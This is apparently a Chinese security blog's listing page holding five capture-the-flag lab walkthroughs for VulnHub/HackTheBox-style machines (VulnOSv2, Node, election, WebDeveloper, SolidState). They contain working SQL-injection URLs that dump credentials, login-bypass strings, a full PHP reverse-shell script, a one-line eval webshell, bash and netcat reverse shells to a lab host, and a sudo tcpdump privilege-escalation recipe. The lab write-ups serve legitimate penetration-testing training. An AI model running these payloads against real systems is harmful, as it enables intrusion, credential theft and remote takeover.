首页
泷羽收录
文章合集
OSCP打靶
渗透学习
渗透工具
工具导航
留言面板
友情链接
Search
1
【红队工具】VShell v4.9.3 高级版,国产C2工具下载及使用
7,420 阅读
2
2025最新渗透测试靶场推荐,新手必练的靶场推荐
5,053 阅读
3
src平台推荐,挖SRC必须知道的25个漏洞提交平台
4,207 阅读
4
几个常见的密码字典推荐
3,228 阅读
5
全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细
3,165 阅读
AI
OSCP打靶
安全服务
建站
泷羽收录
渗透学习
渗透工具
服务器
登录
Search
标签搜索
Windows渗透
域渗透
HackMyVm
CyberStrikeLab靶场
内网渗透
渗透测试
Web安全
网络安全
cyberstrikelab
OSCP
SQL注入
WAF绕过
信息收集
渗透工具
靶场
靶场推荐
MSF
ThinkPHP漏洞
Vulfocus
vulnhub
白小羽
累计撰写
184
篇文章
累计收到
0
条评论
首页
导航
泷羽收录
文章合集
OSCP打靶
渗透学习
渗透工具
工具导航
留言面板
友情链接
搜索到
184
篇与
的结果
2025-05-18
Blender软件的信息泄露---VulnOSv2
【oscp】Blender软件的信息泄露---VulnOSv2端口扫描80探测访问前端页面全端口扫描,有一个6667端口(一款多平台上可使用的IRC守护程序)wappalyzer信息收集使用dirb进行目录扫描都没有结果了,点击页面上的那个website,会跳转到这个页面这里要看仔细一点,这里字体是黑色的,有一个页面路径/jabcd0cs,和用户密码guest/guest去访问这个目录前可以直接使用这个用户登录一下ssh,很明显登录失败访问并登录登录成功这里有一个文件上传(add document)尝试上传shell.php(一句话木马),但是我们并不知道上传的目录在哪再次目录扫描,这次扫描需要加上这个隐藏的路径jabcd0cs这些方法都可以试试,还有一个执行文件的东西,找绝对路径,找到一句话木马的位置可惜都不行这时候就需要细心一点了searchsploit漏洞检索,找到一个漏洞有一个sql注入开始利用http://192.168.111.194/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,user(),3,4,5,6,7,8,9暴库http://192.168.111.194/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,group_concat(schema_name),3,4,5,6,7,8,9 from information_schema.schemata # information_schema,drupal7,jabcd0cs,mysql,performance_schema,phpmyadmin暴表(jabcd0cs表)http://192.168.111.194/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database() # odm_access_log,odm_admin,odm_category,odm_data,odm_department,odm_dept_perms,odm_dept_reviewer,odm_filetypes,odm_log,odm_odmsys,odm_rights,odm_settings,odm_udf,odm_user,odm_user_perms暴字段(jabcd0cs表),但是没有任何关于密码的字段http://192.168.111.194/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201, group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema=database() # file_id,user_id,timestamp,action,id,admin,id,name,id,category,owner,realname,created,description,comment,status,department,default_rights,publishable,reviewer,reviewer_comments,id,name,fid,dept_id,rights,dept_id,user_id,id,type,active,id,modified_on,modified_by,note,revision,id,sys_name,sys_value,RightId,Description,id,name,value,descripti这里有一个注意点,就是用字符串表名来查表的时候查不出来,payload如下:http://192.168.111.194/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201, group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema=database() and table_name=odm_user这里要把表的字符串换成16进制,6f646d5f75736572所以完整暴字段(带表)的payload是http://192.168.111.194/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201, group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema=database() and table_name=0x6f646d5f75736572 # id,username,password,department,phone,Email,last_name,first_name,pw_reset_code查密码http://192.168.111.194/jabcd0cs/ajax_udf.php ?q=1 &add_value=odm_user%20UNION%20SELECT%201, group_concat(username,password),3,4,5,6,7,8,9 from odm_user # webmin # b78aae356709f8c31118ea613980954b # webmin1980 # guest # 084e0343a0486ff05530df6c705c8bb4 # guest知道了账号密码,第一时间测试ssh连接,连接成功了内核信息收集内核漏洞检索(没有漏洞)历史命令,看到用户vulnosadmin的目录下面的文件,有很多hydra的文件运行一下使用make命令(Makefile 是一个文本文件,其中定义了如何构建程序所需的规则和步骤。)再查看进程信息,ps -aux,包含了postgres数据库将/usr/share/wordlists/metasploit/postgres_default_pass.txt和postgres_default_user.txt文件传到靶机上,进行密码爆破。爆破出 postgres/postgres登录postgres数据库psql -h localhost -U postgresl,注意,postgres数据库查询语句区分大小写vulnosadmin / c4nuh4ckm3tw1c3将此文件复制到网页根目录下面本机下载,打开这个网站,并上传上去,点击旁边的那个框,就可以看到密码了https://imagetostl.com/cn/view-blend-onlineTips:.blend 文件是 Blender 软件的专有文件格式,用于保存 3D 制作项目。第二种方法,内核提权,信息收集低版本的内核提权传到靶机上,编译,并运行,提权成功注意点在使用sql注入的时候如果不能正常的根据表名查找数据,那么可以将其转换为十六进制,例如http://192.168.111.194/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201, group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema=database() and table_name=0x6f646d5f75736572 # odm_userpostgres数据库的登录命令psql -h localhost -U postgrespostgres数据库的查询语句,是区分大小写的l :显示数据库c:切换连接的数据库往期推荐【oscp】Tr0ll 靶机全系列(1-3),FTP被玩坏了【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏HTB-Chemistry靶机渗透教程ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略开箱即用!265种windows渗透工具合集--灵兔宝盒
2025年05月18日
365 阅读
0 评论
0 点赞
2025-05-18
提权靶机Node
主机探测 && 80端口探测端口扫描,只开启了3000和22端口,看样子就是要让我们从3000这个端口找22登录的信息访问3000端口的网页向我们新成员问好,一共有三个用户tom,mark,rastating切换到登录界面,sql侏儒万能密码 / 弱口令tom' or 1=1 --+ tom' or 1=1 -- + tom' or 1=1 # tom" or 1=1 # tom" || 1=1 # tom' || 1=1 --+这里意思就是说,MyPlace这个项目的介绍,告诉我们,注册的入口已经关闭了,我们可以查看用户的资料查看用户资料,三个人都是一个信息User xxx are still not completed, check back later to learn more about mark!用户界面的sql注入cookie伪造,利用cookie伪造,可以绕过前端验证的cookie找到app.js,暴露了所有的路由信息,但是没啥用基本都访问过了我们看看接口信息有一个/api/users访问,信息泄露了[ {"_id":"59a7365b98aa325cc03ee51c","username":"myP14ceAdm1nAcc0uNT","password":"dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af","is_admin":true}, {"_id":"59a7368398aa325cc03ee51d","username":"tom","password":"f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240","is_admin":false}, {"_id":"59a7368e98aa325cc03ee51e","username":"mark","password":"de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73","is_admin":false}, {"_id":"59aa9781cced6f1d1490fce9","username":"rastating","password":"5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0","is_admin":false} ]识别一下吧,hash-identifier是一个hash值的识别工具https://www.cmd5.com/ 丢进去一个一个解密,只有第四个用户没有解出来myP14ceAdm1nAcc0uNT :manchestertom :spongebobmark :snowflake有了账号密码,还可以测试ssh连接,刚开始端口扫描的时候是有一个22端口ssh的管理员 myP14ceAdm1nAcc0uNT 成功页面不清楚这是什么文件嘞换一个用户 tom那么只能从管理员用户的那个backup文件下手了查看文件内容,疑似base64重定向到一个zip文件,解压的时候,提示我们输入密码,看样子这就是一个备份的zip文件利用fcrackzip使用kali自带的字典破解zip压缩包切换到目录下,看样子应该是网站的源码了版本信息,包含了express.js版本和mongodb版本查看app.js泄露了数据库的密码盲猜ssh密码和数据库密码一模一样,登录成功内核信息收集漏洞检索,发现几个可能的内核提权漏洞复制到当前目录 searchsploit -m 编号开启http服务下载命令检查wget 192.168.111.128:8000/44300.c wget 192.168.111.128:8000/44298.c wget 192.168.111.128:8000/40049.c wget 192.168.111.128:8000/40871.c将四个文件传到靶机上进行编译,一个一个尝试,编译失败也不要紧,就换一个exp,最后得到44298.c这个exp能提权成功本靶机主要是前端express.js编写的前端项目,项目打包的源码暴露了api接口的信息,通过访问此api接口,由于后端的过滤不严谨,造成的信息泄露,进而获取了目标的权限往期推荐【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略【内网渗透】免工具,内网、域内信息收集的40种方式总结【渗透测试】ATT&CK靶场一,phpmyadmin,域渗透,内网横向移动攻略【渗透测试】Linux隐身登录
2025年05月18日
784 阅读
0 评论
0 点赞
2025-05-18
靶机-election
靶机地址:https://www.[vulnhub](https://so.csdn.net/so/search?q=vulnhub&spm=1001.2101.3001.7020).com/entry/election-1,503/DescriptionIt is an OSCP-like VM, Medium Level difficulty.主机探测 / 80探测全端口扫描,80和22端口开启目录扫描信息收集插件 wapplyzer扫出来的phpinforobots.txt文件,还有一个phpmyadmin,但是不存在弱口令,在本次靶机中没有任何作用election路径,其他三个都没有东西继续目录扫描有一个后台管理继续目录扫描密码泄露love: P@$$w0rd@123系统信息收集sudo和suid文件发现一个奇葩切换用户的文件,先放着继续信息收集,端口信息进程信息发现一个mysql,此时就可以去网站目录找配置文件,查看数据库密码信息数据库登录成功把全部的表都查一查可利用的信息 Zxc123!@#,切换用户yeslove也不行,所以这个数据没有任何用处,网页也登录不了来看这个文件找到一个应用的版本信息漏洞检索复制到当前目录,并开启一个卫星http服务首先判断是否存在wget命令,不存在的话可以使用curl -O没有权限是因为赋予执行权限,使用chmod添加一个可执行权限就好了,执行脚本就能提权成功本靶机主要是网页上的日志信息泄露,从而获取服务器普通用户权限,再根据机器上的应用程序版本的信息搜集,使用漏洞检索工具searchsploit,利用exp进行提权往期推荐【OSCP】sudo的上级目录提权,靶机SkyTower【OSCP】稀有靶机-Readme【OSCP】Hackme【OSCP】Tr0ll 靶机全系列(1-3),FTP被玩坏了【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏
2025年05月18日
1,363 阅读
0 评论
0 点赞
2025-05-18
WEBDEVELOPER,tcpdump提权
【oscp】WEBDEVELOPER,tcpdump提权本次靶机为web-developer靶机下载地址:https://www.vulnhub.com/entry/web-developer-1,288/常规操作,主机发现,80快速探测全端口syn扫描,从扫描结果来看,本次靶机考验的是利用80网页的信息尝试登录sshdirb目录扫描,看目录结构是一个wordpress的网页应用程序可能存在的用户wordpress版本信息,4.9.8利用msf的top100的密码字典,进行爆破(失败)wpscan --url http://192.168.111.201/ -e u -P /usr/share/metasploit-framework/data/wordlists/adobe_top100_pass.txt那么就利用版本漏洞,但是这些都是插件类的,无法绕过密码继续信息收集,刚刚目录扫描出来的结果流量分析wordpress登录的时候基本都是post数据包,我们分析post请求的数据包就行了,得到用户和密码,Form item: "log" = webdeveloper / Te5eQg&4sBS!Yr$)wf%(DcAd登录成功版本确实是4.9.8,这时候就可以看刚刚的漏洞检索的结果了(没找到任何信息)尝试修改默认主题 Twenty Seventeen 的404.php,简单理解英文就是不允许修改(因为此主题已经激活了,需要取消激活)点击右上角的切换主题,修改另一个的404.php,是可以修改成功的 <?php @eval($_POST[cmd]);?>切换到主题页面,进行激活一句话木马不行那么就尝试php的反弹shell,源码如下(kali的/usr/share/webshells/php目录下)<?php // php-reverse-shell - A Reverse Shell implementation in PHP // Copyright (C) 2007 pentestmonkey@pentestmonkey.net // // This tool may be used for legal purposes only. Users take full responsibility // for any actions performed using this tool. The author accepts no liability // for damage caused by this tool. If these terms are not acceptable to you, then // do not use this tool. // // In all other respects the GPL version 2 applies: // // This program is free software; you can redistribute it and/or modify // it under the terms of the GNU General Public License version 2 as // published by the Free Software Foundation. // // This program is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License along // with this program; if not, write to the Free Software Foundation, Inc., // 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. // // This tool may be used for legal purposes only. Users take full responsibility // for any actions performed using this tool. If these terms are not acceptable to // you, then do not use this tool. // // You are encouraged to send comments, improvements or suggestions to // me at pentestmonkey@pentestmonkey.net // // Description // ----------- // This script will make an outbound TCP connection to a hardcoded IP and port. // The recipient will be given a shell running as the current user (apache normally). // // Limitations // ----------- // proc_open and stream_set_blocking require PHP version 4.3+, or 5+ // Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows. // Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available. // // Usage // ----- // See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck. set_time_limit (0); $VERSION = "1.0"; $ip = '192.168.111.128'; // CHANGE THIS $port = 6666; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; // // Daemonise ourself if possible to avoid zombies later // // pcntl_fork is hardly ever available, but will allow us to daemonise // our php process and avoid zombies. Worth a try... if (function_exists('pcntl_fork')) { // Fork and have the parent process exit $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Can't fork"); exit(1); } if ($pid) { exit(0); // Parent exits } // Make the current process a session leader // Will only succeed if we forked if (posix_setsid() == -1) { printit("Error: Can't setsid()"); exit(1); } $daemon = 1; } else { printit("WARNING: Failed to daemonise. This is quite common and not fatal."); } // Change to a safe directory chdir("/"); // Remove any umask we inherited umask(0); // // Do the reverse shell... // // Open reverse connection $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } // Spawn shell process $descriptorspec = array( 0 => array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe that the child will write to ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1); } // Set everything to non-blocking // Reason: Occsionally reads will block, even though stream_select tells us they won't stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { // Check for end of TCP connection if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } // Check for end of STDOUT if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } // Wait until a command is end down $sock, or some // command output is available on STDOUT or STDERR $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); // If we can read from the TCP socket, send // data to process's STDIN if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } // If we can read from the process's STDOUT // send data down tcp connection if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } // If we can read from the process's STDERR // send data down tcp connection if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); // Like print, but does nothing if we've daemonised ourself // (I can't figure out how to redirect STDOUT like a proper daemon) function printit ($string) { if (!$daemon) { print "$stringn"; } } ?>修改404源码后访问任意不存在的文章,即可反弹。例如http://192.168.111.201/index.php/2018/10/30/1111-111112213/这个机器上没有python2,只有3,创建一个交互式shellpython3 -c "import pty; pty.spawn('/bin/bash');"系统信息收集隐藏文件查看,和suid文件的信息收集结果有mysql的进程信息,那么尝试获取mysql的密码ps -aux | grep mysql # 查看进程信息我们切换到网站根目录,查看wordpress的数据库配置文件wp-config.php得到账号密码username : webdeveloper password : MasterOfTheUniversemysql用户表如下,并没有任何的利用信息尝试ssh连接,连接成功sudo -ltcpdump 提权 ,提权失败,TF表示临时文件的意思,需要你手动设置一个可执行的文件COMMAND='/bin/bash' TF="/tmp/shell" # 一个临时的二进制文件 echo "$COMMAND" > $TF chmod +x $TF sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root这里要注意一下,捕获流量包的时候,状态是一直停留在这个界面的,抓包超时可以尝试切换一下网卡查看网卡信息命令如下,切换一个网卡eth0,为了查看回显,把命令改为idCOMMAND='id' TF="/tmp/shell" echo "$COMMAND" > $TF chmod +x $TF sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root # 这里重新指定了一个网卡为eth0可以看到id输出得结果为root,尝试获取shell把命令修改为 /bin/bashCOMMAND='/bin/bash' TF="/tmp/shell" echo "$COMMAND" > $TF chmod +x $TF sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root 失败了能够执行命令,但是普通的终端行不通,那么就反弹shellCOMMAND='/bin/bash -i >& /dev/tcp/192.168.111.128/6666 0>&1' TF="/tmp/shell" echo "$COMMAND" > $TF chmod +x $TF sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root nc也没有-e选项那么试试如下命令COMMAND='rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.111.128 6666 >/tmp/f' TF="/tmp/shell" echo "$COMMAND" > $TF chmod +x $TF sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root 反弹成功但是无法执行命令都不行的话,那么还记得我们之前修改的那个404.php,反弹shell的文件嘛COMMAND='php /var/www/html/wp-content/themes/twentyfifteen/404.php' TF="/tmp/shell" echo "$COMMAND" > $TF chmod +x $TF sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root 提权成功!这个靶场主要是泄露了大鲨鱼的流量包,造成密码信息泄露,然后通过修改主题文件的php文件,反弹shell,然后通过正在运行的mysql服务,查看站点的mysql密码,进一步猜测ssh密码就是mysql的密码,最后通过sudo+tcpdump进行提权。往期推荐【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏从零开始学SQL注入(sql十大注入类型):技术解析与实战演练【RCE剖析】从0-1讲解RCE漏洞绕过,Windows与Linux/RCE漏洞绕过方式总结Linux中Find命令也能提权?提权方式一文通透【渗透测试】Linux隐身登录
2025年05月18日
997 阅读
0 评论
0 点赞
2025-05-18
Vuln靶机SolidState
【oscp】SolidState,计划任务提权靶场地址:https://www.vulnhub.com/entry/solidstate-1,261/发布日期:2018年9月12日目标:得到root权限&找到flag.txt主机探测,端口扫描一些端口介绍:(22,80忽略)25 端口:SMTP服务,用于发送电子邮件的协议110 端口:pop3是用于接收电子邮件的协议119 端口:是用于传输和读取Usernet新闻组文章的协议。4445 端口:是 JAMES 邮件服务器的远程管理接口,允许管理员通过命令行或Web界面管理邮件服务器的配置,包括用户管理、域名管理、邮件箱管理等。访问网页目录扫描这里是需要用到一个命令,来连接邮件服务器,指定好端口4555,然后使用弱口令root / root 进行登录,再使用help查看命令帮助telnet 是一个用于远程登录和管理服务器的网络协议和命令行工具。它允许用户通过网络连接到远程主机,并在该主机上执行命令。telnet 通常使用端口 23 进行通信,但也可以指定其他端口。listusers 用于显示现有的账户信息,但是我们不知道密码信息,就无法登录pop3邮件服务器,查看电子邮件内容user: james user: thomas user: john user: mindy user: mAIladmin设置(重置)密码setpassword james 123 setpassword thomas 123 setpassword john 123 setpassword mindy 123 setpassword mAIladmin 123登录我们的pop3服务器,用户james的邮件信息同理其他用户都这样查看,下面是john的邮件内容下面是mindy用户的第二封邮件翻译一下看看,这个就是 mindy 用户的ssh密码了username: mindy pass: P@55W0rd1!2@ssh登录后,但是发现系统对这个用户做出了命令执行的一些限制当前目录下有一个user.txt,包含了一个hash值,使用hash-identifierhash识别工具,识别这个加密的类型,但是没有识别到尝试逃逸shell,其他详细的逃逸过程可以参考我这篇文章https://mp.weixin.qq.com/s/YS3lNhIE5V5kFlBLxS49xA这里的逃逸是要用到 pythonssh username@IP "export TERM=xterm;python -c 'import pty;pty.spawn("/bin/bash")'"信息收集uname -a cat /etc/os-release # 没有lsb_release -a命令可以使用这个代替查看计划任务cat /etc/crontab查看文件权限为777的文件信息,不是root用户也能修改并执行文件,那如果这是个root用户设置的一个定时程序呢?查看py脚本内容看看nc 有没有-e参数,结果是有的nc 中的 -e 参数在 Netcat (nc) 中用于指定一个程序,使得 Netcat 在建立连接后执行该程序,并将 Netcat 的标准输入、输出和错误重定向到该程序。这个参数通常用于创建反向shell或监听shell。那么py脚本的内容就如下,来反弹shell#!/usr/bin/env python import os import sys try: os.system('nc 192.168.209.130 6666 -e /bin/bash') except: sys.exit()注意:如果重定向了,过了一会儿没有反弹成功,要么重新连接一次,就像这样这下就能反弹成功了,找到root.txt文件如果直接执行py文件的话,是以当前用户执行的,例如可以看到当前用户为 mindy往期推荐红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学Linux 32位Crossfire游戏缓冲区溢出独立开发零显卡AI引擎!媲美DeepSeek,附源码【oscp】Tr0ll 靶机全系列(1-3),FTP被玩坏了神器分享 红队快速打点工具-DarKnuclei从零开始学SQL注入(sql十大注入类型):技术解析与实战演练【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏【渗透测试】12种rbash逃逸方式总结利用MySQL特性,WAF绕过技巧SQL注入绕过某狗的WAF防火墙,这一篇就够了,6k文案超详细
2025年05月18日
860 阅读
0 评论
0 点赞
1
...
24
25
26
...
37